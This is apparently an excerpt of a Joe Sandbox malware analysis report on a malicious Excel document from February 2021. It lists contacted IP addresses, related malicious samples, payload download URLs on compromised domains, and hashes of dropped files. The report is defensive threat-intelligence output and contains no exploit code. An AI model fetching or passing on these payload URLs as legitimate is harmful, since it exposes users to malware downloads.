                    http://investor.msn.com/rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpfalse
                      high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.hotmail.com/oerundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        162.241.80.6
                        unknownUnited States
                        46606UNIFIEDLAYER-AS-1USfalse
                        138.36.237.100
                        unknownArgentina
                        27823DattateccomARfalse
                        68.66.216.42
                        unknownUnited States
                        55293A2HOSTINGUSfalse
                        72.52.227.180
                        unknownUnited States
                        32244LIQUIDWEBUSfalse

                        General Information

                        Joe Sandbox Version:31.0.0 Emerald
                        Analysis ID:356738
                        Start date:23.02.2021
                        Start time:15:49:12
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 28s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:Complaint-1992179913-02182021.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal84.expl.evad.winXLS@11/13@6/4
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Found warning dialog
                        • Click Ok
                        • Found warning dialog
                        • Click Ok
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 91.199.212.52, 2.20.142.209, 2.20.142.210
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, crt.usertrust.com, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        162.241.80.6Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
                        138.36.237.100Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
                        CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                        • jugueteriaelgato.com.ar/zsrrq/416212.jpg
                        CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                        • jugueteriaelgato.com.ar/zsrrq/416212.jpg
                        CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                        • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                        CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                        • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                        fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                        • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                        fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                        • loonytoys.com.ar/rqksqzjvcmv/416212.jpg
                        68.66.216.42Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat
                        ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                        • biblicalisraeltours.com/ivqcapzu/987298.jpg
                        ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                        • biblicalisraeltours.com/ivqcapzu/987298.jpg
                        72.52.227.180Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • rzminc.com/fdzgprclatqo/44250601302777800000.dat
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • rzminc.com/fdzgprclatqo/44250596245254600000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • rzminc.com/fdzgprclatqo/44245960229745400000.dat
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • rzminc.com/fdzgprclatqo/44245955293750000000.dat

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        biblicalisraeltours.comComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        crt.sectigo.comComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 91.199.212.52
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 91.199.212.52
                        CorpReport.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        sys.dllGet hashmaliciousBrowse
                        • 91.199.212.52
                        CorpReport.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        CorpReport.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        ReportCorp.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        1S0a576pAR.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        NJx63jHebE.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        EmployeeComplaintReport.exeGet hashmaliciousBrowse
                        • 91.199.212.52
                        ct.dllGet hashmaliciousBrowse
                        • 91.199.212.52
                        CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                        • 91.199.212.52
                        CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                        • 91.199.212.52
                        documents.docGet hashmaliciousBrowse
                        • 91.199.212.52
                        ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                        • 91.199.212.52
                        N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                        • 91.199.212.52
                        PSX7103491.docGet hashmaliciousBrowse
                        • 91.199.212.52
                        Beauftragung.docGet hashmaliciousBrowse
                        • 91.199.212.52
                        #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                        • 91.199.212.52
                        https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQGet hashmaliciousBrowse
                        • 91.199.212.52
                        rzminc.comComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 72.52.227.180
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 72.52.227.180
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 72.52.227.180
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 72.52.227.180

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        DattateccomARComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        swift copy pdf.exeGet hashmaliciousBrowse
                        • 200.58.111.74
                        Purchase Order _pdf.exeGet hashmaliciousBrowse
                        • 200.58.111.74
                        Purchase Order _pdf.exeGet hashmaliciousBrowse
                        • 200.58.111.74
                        CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        CompensationClaim-1245593270-02032021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        fp5H5ulYUE5566sbSLC2.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        Payment Advice.xlsxGet hashmaliciousBrowse
                        • 66.97.33.176
                        Meezan Bank Payment.xlsxGet hashmaliciousBrowse
                        • 179.43.117.150
                        Walmart Order.xlsxGet hashmaliciousBrowse
                        • 179.43.117.150
                        INQUIRY-NOV-ORDER.xlsGet hashmaliciousBrowse
                        • 179.43.114.162
                        https://bit.ly/38rE21V?/rt/stone/Get hashmaliciousBrowse
                        • 200.58.98.166
                        PQ-237.xlsGet hashmaliciousBrowse
                        • 66.97.33.213
                        PQ-237.xlsGet hashmaliciousBrowse
                        • 66.97.33.213
                        UNIFIEDLAYER-AS-1USComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 162.241.80.6
                        Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 162.241.80.6
                        Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                        • 50.116.112.43
                        ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                        • 50.87.196.120
                        PO-A2174679-06.exeGet hashmaliciousBrowse
                        • 192.185.78.145
                        22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                        • 108.167.156.42
                        CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                        • 192.185.181.49
                        PO.exeGet hashmaliciousBrowse
                        • 192.185.0.218
                        Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                        • 192.185.16.95
                        ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                        • 162.214.158.75
                        AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                        • 192.185.46.55
                        iAxkn PDF.exeGet hashmaliciousBrowse
                        • 192.185.100.181
                        carta de pago pdf.exeGet hashmaliciousBrowse
                        • 192.185.5.166
                        PO.exeGet hashmaliciousBrowse
                        • 108.179.232.42
                        payment details.pdf.exeGet hashmaliciousBrowse
                        • 50.87.95.32
                        new order.exeGet hashmaliciousBrowse
                        • 108.179.232.42
                        CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                        • 192.185.181.49
                        RdLlHaxEKP.exeGet hashmaliciousBrowse
                        • 162.214.184.71
                        Drawings2.exeGet hashmaliciousBrowse
                        • 198.57.247.220
                        EFT Remittance.xlsGet hashmaliciousBrowse
                        • 162.241.120.180
                        A2HOSTINGUSComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        SecuriteInfo.com.Heur.10413.xlsGet hashmaliciousBrowse
                        • 68.66.216.42
                        Statement_of_Account_as_of 02_17_2021.xlsmGet hashmaliciousBrowse
                        • 68.66.248.35
                        Statement_of_Account_as_of 02_17_2021.xlsmGet hashmaliciousBrowse
                        • 68.66.248.35
                        Claim-121548989-02162021.xlsGet hashmaliciousBrowse
                        • 68.66.226.85
                        ProtectedAdviceSlip.xlsGet hashmaliciousBrowse
                        • 70.32.23.16
                        v1K1JNtCgt.exeGet hashmaliciousBrowse
                        • 209.124.66.12
                        CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        CompensationClaim-1625519734-02022021.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        CompensationClaim-1828072340-02022021.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        ac6e58332e379d0712d36c5c83985c42.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        CompensationClaim-1378529713-02022021.xlsGet hashmaliciousBrowse
                        • 185.148.129.158
                        v22Pc0qA.doc.docGet hashmaliciousBrowse
                        • 70.32.23.44
                        2wUaqWdy.doc.docGet hashmaliciousBrowse
                        • 70.32.23.44
                        A3kAp3uzpg.xlsmGet hashmaliciousBrowse
                        • 85.187.128.19
                        X.exeGet hashmaliciousBrowse
                        • 66.198.240.46

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        7dcce5b76c8b17472d024758970a406bComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        mexhlc.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        document-550193913.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        document-1915351743.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                        • 138.36.237.100
                        Subconract 504.xlsmGet hashmaliciousBrowse
                        • 138.36.237.100
                        upbck.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        IMG_6078_SCANNED.docGet hashmaliciousBrowse
                        • 138.36.237.100
                        RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        _a6590.docxGet hashmaliciousBrowse
                        • 138.36.237.100
                        Small Charities.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        quotation10204168.dox.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        notice of arrival.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        22-2-2021 .xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        Shipping_Document.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        Remittance copy.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        CI + PL.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                        • 138.36.237.100
                        124992436.docxGet hashmaliciousBrowse
                        • 138.36.237.100
                        document-1900770373.xlsGet hashmaliciousBrowse
                        • 138.36.237.100

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1559
                        Entropy (8bit):7.399832861783252
                        Encrypted:false
                        SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                        MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                        SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                        SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                        SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                        Category:dropped
                        Size (bytes):59134
                        Entropy (8bit):7.995450161616763
                        Encrypted:true
                        SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                        MD5:E92176B0889CC1BB97114BEB2F3C1728
                        SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                        SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                        SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1413
                        Entropy (8bit):7.480496427934893
                        Encrypted:false
                        SSDEEP:24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
                        MD5:285EC909C4AB0D2D57F5086B225799AA
                        SHA1:D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
                        SHA-256:68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
                        SHA-512:4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: 0...0..i.......9rD:.".Q..l..15.0...*.H........0{1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Comodo CA Limited1!0...U....AAA Certificate Services0...190312000000Z..281231235959Z0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0.."0...*.H.............0..........e.6......W.v..'.L.P.a. M.-d.....=.........{7(.+G.9.:.._..}..cB.v.;+...o... ..>..t.....bd......j."<......{......Q..gF.Q..T?.3.~l......Q.5..f.rg.!f..x..P:.....L....5.WZ....=.,..T....:M.L..\... =.."4.~;hf.D..NFS.3`...S7.sC.2.S...tNi.k.`.......2..;Qx.g..=V...i....%&k3m.nG.sC.~..f.)|2.cU.....T0....}7..]:l5\.A...I......b..f.%....?.9......L.|.k..^...g.....[..L..[...s.#;-..5Ut.I.IX...6.Q...&}.M....C&.A_@.DD...W..P.WT.>.tc/.Pe..XB.C.L..%GY.....&FJP...x..g...W...c..b.._U..\.(..%9..+..L...?.R.../..........0..0...U.#..0......#>.....)...0..0...U......Sy.Z.+J.T.......f.0...U...........0...U.......0....0...U
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):282
                        Entropy (8bit):3.12972515711339
                        Encrypted:false
                        SSDEEP:3:kkFklynWyE/XfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKrn1E/qjXxp9jKFlIaYM2+/LOjA/
                        MD5:854A030C3464773C334B42C2A583E11A
                        SHA1:CAF4D2F1740F7BB87A98ACEEB27D04485BD5B255
                        SHA-256:D7A0B754884001039686354200AD9EFA1D4F5FCD36F4B6E86F24AB82D9A29764
                        SHA-512:6838CBD3F15073557501B9575341CBE33222C00F5E886E1565CE6EC04495DEE9F38CB524929D1AD8479AE83C0078F78C806F08EDFE77101518A3DEA89B517337
                        Malicious:false
                        Reputation:low
                        Preview: p...... .........BO.>...(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):328
                        Entropy (8bit):3.090852246460565
                        Encrypted:false
                        SSDEEP:6:kK9fpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Vfw3kPlE99SNxAhUeo+aKt
                        MD5:03F4FE715EC177431092518DEDEC2105
                        SHA1:7AB48FD7D5BE49668DF301820AABA734A3C821BB
                        SHA-256:63CAFAC0A1BF3DD49E0691169209E115ABB992851A02D81F19C0532C5978F6E5
                        SHA-512:F596DFA694E9F8ADE1A3F1FCA470E73B6E21D877EC3A0B4B70FD0CDFAE04EEBB41374E3D7CA3C870D02EC1324B2AC4A84FFC20EF38338EB18F507BFD0DA24054
                        Malicious:false
                        Reputation:low
                        Preview: p...... ........T...>...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):250
                        Entropy (8bit):2.977287375524799
                        Encrypted:false
                        SSDEEP:3:kkFklNlP9/XfllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9lytn:kKk9/qQAbjMulgokaWbLOW+n
                        MD5:895704621DE30F18E9C830F1A0E2B7B4
                        SHA1:112CE89AEC27FE8EB0C693DF6D630CE07CC0EC5B
                        SHA-256:0F65DA1C7A911D53DCA674FB0EF9FABDD9ED875BC94E2E5B0D506F42FC87A944
                        SHA-512:0F0F54264ED2325919320633CFD5B53AF2FBDAA813F109CF5FA574FE3103E59F893E1BFC5C9CEFC6757E5110F89E435E77AB8DFCD2628792A12ADB3F82AAF739
                        Malicious:false
                        Reputation:low
                        Preview: p...... ....h.....~.>...(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...
                        C:\Users\user\AppData\Local\Temp\95DE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):31752
                        Entropy (8bit):7.6478387604130065
                        Encrypted:false
                        SSDEEP:768:TkBP+MDFc5uhNUuOW+u7qS7oauYEmUI/VHct:TQWMHNffMaFT9i
                        MD5:0CBEB72487F44A6B17B875FF892D6E52
                        SHA1:2C39127265E91516D1FDBE952E112BFB91800F44
                        SHA-256:408FDE2152A6C51A3B76239040ACC0390D815686E3B20AFB2BE458E5E809617C
                        SHA-512:C99BD12332BDDA57ABC5EA45EEA4665B4F93246BBB4D82278C90B80611FE66823CC2963E865B41F1D820097B5E2D19E044946E992C9B4F02C3B68F34292C11D5
                        Malicious:false
                        Preview: .U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\CabEE94.tmp
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                        Category:dropped
                        Size (bytes):59134
                        Entropy (8bit):7.995450161616763
                        Encrypted:true
                        SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                        MD5:E92176B0889CC1BB97114BEB2F3C1728
                        SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                        SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                        SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                        Malicious:false
